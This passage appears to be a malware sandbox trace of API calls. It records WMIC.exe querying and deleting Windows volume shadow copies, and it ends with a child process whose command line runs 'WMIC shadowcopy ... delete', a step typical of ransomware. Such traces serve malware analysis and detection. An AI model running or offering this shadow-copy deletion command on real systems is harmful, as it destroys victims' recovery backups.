_Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0095.143] malloc (_Size=0x18) returned 0x4ccb80 [0095.143] free (_Block=0x4ccc00) [0095.143] free (_Block=0x4cd080) [0095.143] free (_Block=0x4ccb80) [0095.143] lstrlenW (lpString="SET") returned 3 [0095.143] lstrlenW (lpString="delete") returned 6 [0095.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0095.143] lstrlenW (lpString="CREATE") returned 6 [0095.143] lstrlenW (lpString="delete") returned 6 [0095.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0095.143] free (_Block=0x4ccef0) [0095.143] malloc (_Size=0x8) returned 0x4c6f20 [0095.143] lstrlenW (lpString="GET") returned 3 [0095.143] lstrlenW (lpString="delete") returned 6 [0095.143] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0095.144] lstrlenW (lpString="LIST") returned 4 [0095.144] lstrlenW (lpString="delete") returned 6 [0095.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0095.144] lstrlenW (lpString="ASSOC") returned 5 [0095.144] lstrlenW (lpString="delete") returned 6 [0095.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0095.144] WbemLocator:IUnknown:AddRef (This=0x1f71390) returned 0x3 [0095.144] free (_Block=0x2fdfb0) [0095.144] lstrlenW (lpString="") returned 0 [0095.144] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0095.144] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.144] malloc (_Size=0x14) returned 0x4ccb80 [0095.144] lstrlenW (lpString="XDUWTFONO") returned 9 [0095.144] GetCurrentThreadId () returned 0x618 [0095.144] GetCurrentProcess () returned 0xffffffffffffffff [0095.144] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18fa00 | out: TokenHandle=0x18fa00*=0x27c) returned 1 [0095.144] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f9f8 | out: TokenInformation=0x0, ReturnLength=0x18f9f8) returned 0 [0095.144] malloc (_Size=0x118) returned 0x4cd080 [0095.144] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x4cd080, TokenInformationLength=0x118, ReturnLength=0x18f9f8 | out: TokenInformation=0x4cd080, ReturnLength=0x18f9f8) returned 1 [0095.144] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x4cd080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1328338874, Attributes=0x6b1d), (Luid.LowPart=0x0, Luid.HighPart=5033712, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0095.144] free (_Block=0x4cd080) [0095.144] CloseHandle (hObject=0x27c) returned 1 [0095.144] lstrlenW (lpString="GET") returned 3 [0095.144] lstrlenW (lpString="delete") returned 6 [0095.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0095.144] lstrlenW (lpString="LIST") returned 4 [0095.145] lstrlenW (lpString="delete") returned 6 [0095.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0095.145] lstrlenW (lpString="SET") returned 3 [0095.145] lstrlenW (lpString="delete") returned 6 [0095.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0095.145] lstrlenW (lpString="CALL") returned 4 [0095.145] lstrlenW (lpString="delete") returned 6 [0095.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0095.145] lstrlenW (lpString="ASSOC") returned 5 [0095.145] lstrlenW (lpString="delete") returned 6 [0095.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0095.145] lstrlenW (lpString="CREATE") returned 6 [0095.145] lstrlenW (lpString="delete") returned 6 [0095.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0095.145] lstrlenW (lpString="DELETE") returned 6 [0095.145] lstrlenW (lpString="delete") returned 6 [0095.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0095.145] malloc (_Size=0x18) returned 0x4ccc00 [0095.145] lstrlenA (lpString="") returned 0 [0095.145] malloc (_Size=0x2) returned 0x2fdfb0 [0095.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff38314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0095.145] free (_Block=0x2fdfb0) [0095.145] malloc (_Size=0x18) returned 0x4ccca0 [0095.145] lstrlenA (lpString="") returned 0 [0095.145] malloc (_Size=0x2) returned 0x2fdfb0 [0095.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff38314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0095.146] free (_Block=0x2fdfb0) [0095.146] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0095.146] malloc (_Size=0x3e) returned 0x4cd080 [0095.146] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0095.146] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0095.146] malloc (_Size=0x18) returned 0x4ccba0 [0095.146] free (_Block=0x4ccca0) [0095.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0095.146] lstrlenW (lpString="FROM") returned 4 [0095.146] lstrlenW (lpString="*") returned 1 [0095.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0095.146] malloc (_Size=0x18) returned 0x4ccca0 [0095.146] free (_Block=0x4ccba0) [0095.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0095.146] lstrlenW (lpString="FROM") returned 4 [0095.146] lstrlenW (lpString="from") returned 4 [0095.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0095.146] malloc (_Size=0x18) returned 0x4ccba0 [0095.146] free (_Block=0x4ccca0) [0095.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0095.146] malloc (_Size=0x18) returned 0x4ccca0 [0095.146] free (_Block=0x4ccba0) [0095.146] free (_Block=0x4cd080) [0095.146] malloc (_Size=0x18) returned 0x4ccba0 [0095.146] malloc (_Size=0x18) returned 0x4ccc20 [0095.146] malloc (_Size=0x18) returned 0x4ccc40 [0095.147] malloc (_Size=0x18) returned 0x4ccc60 [0095.147] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0095.147] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0095.147] malloc (_Size=0x18) returned 0x4ccc80 [0095.147] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0095.147] SysStringLen (param_1=" WHERE ") returned 0x7 [0095.147] malloc (_Size=0x18) returned 0x4cccc0 [0095.147] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0095.147] SysStringLen (param_1="ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 0x2b [0095.147] free (_Block=0x4ccc00) [0095.147] free (_Block=0x4ccc80) [0095.147] free (_Block=0x4ccc60) [0095.147] free (_Block=0x4ccc40) [0095.147] free (_Block=0x4ccc20) [0095.147] free (_Block=0x4ccba0) [0095.147] ??0CHString@@QEAA@XZ () returned 0x18f970 [0095.147] GetCurrentThreadId () returned 0x618 [0095.147] malloc (_Size=0x18) returned 0x4ccba0 [0095.147] malloc (_Size=0x18) returned 0x4ccc20 [0095.147] malloc (_Size=0x18) returned 0x4ccc40 [0095.147] malloc (_Size=0x18) returned 0x4ccc60 [0095.147] malloc (_Size=0x18) returned 0x4ccc80 [0095.147] SysStringLen (param_1="\\\\") returned 0x2 [0095.147] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0095.148] malloc (_Size=0x18) returned 0x4ccc00 [0095.148] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0095.148] SysStringLen (param_1="\\") returned 0x1 [0095.148] malloc (_Size=0x18) returned 0x4ccce0 [0095.148] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0095.148] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0095.148] free (_Block=0x4ccc00) [0095.148] free (_Block=0x4ccc80) [0095.148] free (_Block=0x4ccc60) [0095.148] free (_Block=0x4ccc40) [0095.148] free (_Block=0x4ccc20) [0095.148] free (_Block=0x4ccba0) [0095.148] malloc (_Size=0x18) returned 0x4ccba0 [0095.148] malloc (_Size=0x18) returned 0x4ccc20 [0095.148] malloc (_Size=0x18) returned 0x4ccc40 [0095.148] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f71390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff3f29d0 | out: ppNamespace=0xff3f29d0*=0x1f83c18) returned 0x0 [0095.152] free (_Block=0x4ccc40) [0095.152] free (_Block=0x4ccc20) [0095.152] free (_Block=0x4ccba0) [0095.152] CoSetProxyBlanket (pProxy=0x1f83c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0095.153] free (_Block=0x4ccce0) [0095.153] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0095.153] ??0CHString@@QEAA@XZ () returned 0x18f8c0 [0095.153] GetCurrentThreadId () returned 0x618 [0095.153] malloc (_Size=0x18) returned 0x4ccce0 [0095.153] lstrlenA (lpString="") returned 0 [0095.153] malloc (_Size=0x2) returned 0x2fdfb0 [0095.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff38314c, cbMultiByte=-1, lpWideCharStr=0x2fdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0095.153] free (_Block=0x2fdfb0) [0095.153] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 0x50 [0095.153] SysStringLen (param_1="") returned 0x0 [0095.153] free (_Block=0x4ccce0) [0095.153] malloc (_Size=0x18) returned 0x4ccce0 [0095.153] IWbemServices:ExecQuery (in: This=0x1f83c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'", lFlags=0, pCtx=0x0, ppEnum=0x18f8c8 | out: ppEnum=0x18f8c8*=0x1f83d18) returned 0x0 [0095.205] free (_Block=0x4ccce0) [0095.205] CoSetProxyBlanket (pProxy=0x1f83d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0095.208] IEnumWbemClassObject:Next (in: This=0x1f83d18, lTimeout=-1, uCount=0x1, apObjects=0x18f8d0, puReturned=0x18f8e0 | out: apObjects=0x18f8d0*=0x1f83d80, puReturned=0x18f8e0*=0x1) returned 0x0 [0095.209] malloc (_Size=0x18) returned 0x4ccce0 [0095.209] IWbemClassObject:Get (in: This=0x1f83d80, wszName="__PATH", lFlags=0, pVal=0x18f8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0095.209] free (_Block=0x4ccce0) [0095.209] malloc (_Size=0x800) returned 0x4cd080 [0095.209] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x4cd080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0095.209] FormatMessageW (in: dwFlags=0x2500, lpSource=0x4cd080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x18f818, nSize=0x0, Arguments=0x18f828 | out: lpBuffer="뚐'") returned 0x67 [0095.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0095.209] malloc (_Size=0x68) returned 0x4cd890 [0095.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x4cd890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0095.209] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff3f2ab0 [0095.209] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0095.210] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0095.210] free (_Block=0x4cd890) [0095.210] free (_Block=0x4cd080) [0095.210] LocalFree (hMem=0x27b690) returned 0x0 [0095.210] IWbemServices:DeleteInstance (in: This=0x1f83c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0096.780] IUnknown:Release (This=0x1f83d80) returned 0x0 [0096.780] malloc (_Size=0x800) returned 0x4cd080 [0096.780] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x4cd080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0096.781] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.781] malloc (_Size=0x20) returned 0x4ccef0 [0096.781] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x4ccef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0096.781] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff3f2ab0 [0096.781] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0096.781] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0096.781] free (_Block=0x4ccef0) [0096.781] free (_Block=0x4cd080) [0096.782] IEnumWbemClassObject:Next (in: This=0x1f83d18, lTimeout=-1, uCount=0x1, apObjects=0x18f8d0, puReturned=0x18f8e0 | out: apObjects=0x18f8d0*=0x0, puReturned=0x18f8e0*=0x0) returned 0x1 [0096.783] IUnknown:Release (This=0x1f83d18) returned 0x0 [0096.785] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0096.785] free (_Block=0x4ccca0) [0096.785] free (_Block=0x4cccc0) [0096.785] GetCurrentThreadId () returned 0x618 [0096.785] ??0CHString@@QEAA@PEBG@Z () returned 0x18faa8 [0096.785] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x18faa8 [0096.785] lstrlenW (lpString="LIST") returned 4 [0096.786] lstrlenW (lpString="delete") returned 6 [0096.786] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0096.786] lstrlenW (lpString="ASSOC") returned 5 [0096.786] lstrlenW (lpString="delete") returned 6 [0096.786] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0096.786] lstrlenW (lpString="GET") returned 3 [0096.786] lstrlenW (lpString="delete") returned 6 [0096.786] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0096.786] ??1CHString@@QEAA@XZ () returned 0x51d32a01 [0096.786] WbemLocator:IUnknown:Release (This=0x1f83c18) returned 0x0 [0096.787] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0096.787] _kbhit () returned 0x0 [0096.787] free (_Block=0x4c6f20) [0096.787] free (_Block=0x4ccac0) [0096.788] free (_Block=0x4ccaa0) [0096.788] free (_Block=0x4cca80) [0096.788] free (_Block=0x4cca60) [0096.788] free (_Block=0x4c70a0) [0096.788] free (_Block=0x4ccb40) [0096.788] free (_Block=0x4c85c0) [0096.788] free (_Block=0x4cd020) [0096.788] free (_Block=0x4ccbc0) [0096.788] free (_Block=0x4ccfa0) [0096.788] free (_Block=0x4ccae0) [0096.788] free (_Block=0x4ccbe0) [0096.788] free (_Block=0x4c7140) [0096.788] free (_Block=0x4c6e00) [0096.788] free (_Block=0x4ccff0) [0096.788] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0096.788] free (_Block=0x4cce20) [0096.788] free (_Block=0x4ccb00) [0096.788] free (_Block=0x4ccb20) [0096.788] free (_Block=0x4ccf30) [0096.789] free (_Block=0x4ccb60) [0096.789] free (_Block=0x4c7ee0) [0096.789] free (_Block=0x4c7f30) [0096.789] free (_Block=0x4c7f80) [0096.789] free (_Block=0x4ccb80) [0096.789] free (_Block=0x4c6a20) [0096.789] free (_Block=0x4c6de0) [0096.789] free (_Block=0x4c8040) [0096.789] free (_Block=0x4c6dc0) [0096.789] free (_Block=0x4c8000) [0096.789] free (_Block=0x4c6d60) [0096.789] free (_Block=0x4c6d80) [0096.789] free (_Block=0x4c6c40) [0096.789] free (_Block=0x4c6c60) [0096.789] free (_Block=0x4c6be0) [0096.789] free (_Block=0x4c6c00) [0096.790] free (_Block=0x4c6ca0) [0096.790] free (_Block=0x4c6cc0) [0096.790] free (_Block=0x4c6d00) [0096.790] free (_Block=0x4c6d20) [0096.790] free (_Block=0x4c6b20) [0096.790] free (_Block=0x4c6b40) [0096.790] free (_Block=0x4c6ac0) [0096.790] free (_Block=0x4c6ae0) [0096.790] free (_Block=0x4c6b80) [0096.790] free (_Block=0x4c6ba0) [0096.790] free (_Block=0x4c6a60) [0096.790] free (_Block=0x4c6a80) [0096.790] free (_Block=0x4c69d0) [0096.790] free (_Block=0x4c69a0) [0096.790] free (_Block=0x4c6e90) [0096.791] WbemLocator:IUnknown:Release (This=0x1f71390) returned 0x2 [0096.791] WbemLocator:IUnknown:Release (This=0x1f83b28) returned 0x0 [0096.791] WbemLocator:IUnknown:Release (This=0x1f83a98) returned 0x0 [0096.792] WbemLocator:IUnknown:Release (This=0x1f71390) returned 0x1 [0096.792] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0096.792] WbemLocator:IUnknown:Release (This=0x1f71390) returned 0x0 [0096.792] free (_Block=0x4cc9e0) [0096.792] free (_Block=0x4cca00) [0096.792] free (_Block=0x4c8540) [0096.792] free (_Block=0x4cca20) [0096.792] free (_Block=0x4cca40) [0096.792] free (_Block=0x4c8580) [0096.792] free (_Block=0x4cc860) [0096.792] free (_Block=0x4cc880) [0096.792] free (_Block=0x4c83c0) [0096.792] free (_Block=0x4cc8a0) [0096.792] free (_Block=0x4cc8c0) [0096.792] free (_Block=0x4c8400) [0096.792] free (_Block=0x4cc7e0) [0096.792] free (_Block=0x4cc800) [0096.792] free (_Block=0x4c8340) [0096.792] free (_Block=0x4cc820) [0096.793] free (_Block=0x4cc840) [0096.793] free (_Block=0x4c8380) [0096.793] free (_Block=0x4cc960) [0096.793] free (_Block=0x4cc980) [0096.793] free (_Block=0x4c84c0) [0096.793] free (_Block=0x4cc9a0) [0096.793] free (_Block=0x4cc9c0) [0096.793] free (_Block=0x4c8500) [0096.793] free (_Block=0x4cc760) [0096.793] free (_Block=0x4cc780) [0096.793] free (_Block=0x4c82c0) [0096.793] free (_Block=0x4cc7a0) [0096.793] free (_Block=0x4cc7c0) [0096.793] free (_Block=0x4c8300) [0096.793] free (_Block=0x4cc8e0) [0096.793] free (_Block=0x4cc900) [0096.793] free (_Block=0x4c8440) [0096.793] free (_Block=0x4cc920) [0096.793] free (_Block=0x4cc940) [0096.794] free (_Block=0x4c8480) [0096.794] free (_Block=0x4cc6a0) [0096.794] free (_Block=0x4cc6c0) [0096.794] free (_Block=0x4c8200) [0096.794] free (_Block=0x4cc560) [0096.794] free (_Block=0x4cc580) [0096.794] free (_Block=0x4c80c0) [0096.794] free (_Block=0x4c6e50) [0096.794] free (_Block=0x4c6e70) [0096.794] free (_Block=0x4c8080) [0096.794] free (_Block=0x4cc5e0) [0096.794] free (_Block=0x4cc600) [0096.794] free (_Block=0x4c8140) [0096.794] free (_Block=0x4cc6e0) [0096.794] free (_Block=0x4cc700) [0096.794] free (_Block=0x4c8240) [0096.794] free (_Block=0x4cc5a0) [0096.794] free (_Block=0x4cc5c0) [0096.794] free (_Block=0x4c8100) [0096.795] free (_Block=0x4cc620) [0096.795] free (_Block=0x4cc640) [0096.795] free (_Block=0x4c8180) [0096.795] free (_Block=0x4cc660) [0096.795] free (_Block=0x4cc680) [0096.795] free (_Block=0x4c81c0) [0096.795] free (_Block=0x4cc720) [0096.795] free (_Block=0x4cc740) [0096.795] free (_Block=0x4c8280) [0096.795] CoUninitialize () [0096.820] exit (_Code=0) [0096.820] free (_Block=0x4ccd30) [0096.820] free (_Block=0x4c7ea0) [0096.820] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0096.820] free (_Block=0x4c6f40) [0096.821] free (_Block=0x4c6a40) [0096.821] free (_Block=0x4c7e60) [0096.821] free (_Block=0x4c7e20) [0096.821] free (_Block=0x4c7dd0) [0096.821] free (_Block=0x4c7d90) [0096.821] free (_Block=0x4c7d30) [0096.821] free (_Block=0x4c5a90) [0096.821] free (_Block=0x4c5a50) [0096.821] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0096.821] free (_Block=0x4ccec0) Thread: id = 145 os_tid = 0xb74 Thread: id = 146 os_tid = 0xad8 Thread: id = 147 os_tid = 0x5bc Thread: id = 148 os_tid = 0x83c Thread: id = 149 os_tid = 0x564 Process: id = "20" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x20eef000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 150 os_tid = 0x664 [0096.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef830 | out: lpSystemTimeAsFileTime=0x2ef830*(dwLowDateTime=0x41588190, dwHighDateTime=0x1d68245)) [0096.900] GetCurrentProcessId () returned 0x67c [0096.900] GetCurrentThreadId () returned 0x664 [0096.900] GetTickCount () returned 0x114df38 [0096.900] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef838 | out: lpPerformanceCount=0x2ef838*=21679325419) returned 1 [0096.902] GetModuleHandleW (lpModuleName=0x0) returned 0x49f90000 [0096.902] __set_app_type (_Type=0x1) [0096.902] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fb7810) returned 0x0 [0096.902] __getmainargs (in: _Argc=0x49fda608, _Argv=0x49fda618, _Env=0x49fda610, _DoWildCard=0, _StartInfo=0x49fbe0f4 | out: _Argc=0x49fda608, _Argv=0x49fda618, _Env=0x49fda610) returned 0 [0096.902] GetCurrentThreadId () returned 0x664 [0096.902] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x664) returned 0x3c [0096.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0096.902] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0096.902] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0096.903] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.903] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef7c8 | out: phkResult=0x2ef7c8*=0x0) returned 0x2 [0096.903] VirtualQuery (in: lpAddress=0x2ef7b0, lpBuffer=0x2ef730, dwLength=0x30 | out: lpBuffer=0x2ef730*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0096.903] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef730, dwLength=0x30 | out: lpBuffer=0x2ef730*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 